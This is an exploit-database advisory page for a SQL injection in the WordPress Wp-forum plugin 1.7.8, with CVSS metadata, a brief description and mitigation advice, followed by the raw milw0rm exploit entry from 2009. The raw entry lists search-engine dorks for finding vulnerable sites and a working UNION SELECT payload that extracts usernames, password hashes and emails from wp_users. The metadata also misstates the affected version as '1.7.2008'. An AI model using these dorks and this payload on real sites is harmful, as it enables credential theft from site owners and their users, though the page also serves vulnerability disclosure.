Wordpress Wp-forum plugin 1.7.8 Sql injection vulnerability

vendor:

Wp-forum

by:

seomafia

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Wp-forum

Affected Version From: 1.7.2008

Affected Version To: 1.7.2008

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:wp-forum:1.7.8

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

WordPress Wp-forum plugin 1.7.8 Sql injection vulnerability

A SQL injection vulnerability exists in the Wordpress Wp-forum plugin 1.7.8. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames, passwords, and emails.

Mitigation:

Upgrade to the latest version of the Wordpress Wp-forum plugin.

Source

Exploit-DB raw data:

-----------------------------------------------------------------------------------------------
# Wordpress Wp-forum plugin 1.7.8 Sql injection vulnerability #
-----------------------------------------------------------------------------------------------
Author: [[seomafia]]
#########################

Dorks:
allinurl:page_id inurl:showforum
inurl:plugins/wp-forum
"index of /" wp-forum

#######################

Example :
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL]


Exploit:
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*

#######################

Greetz: Exploit.In

# milw0rm.com [2009-01-12]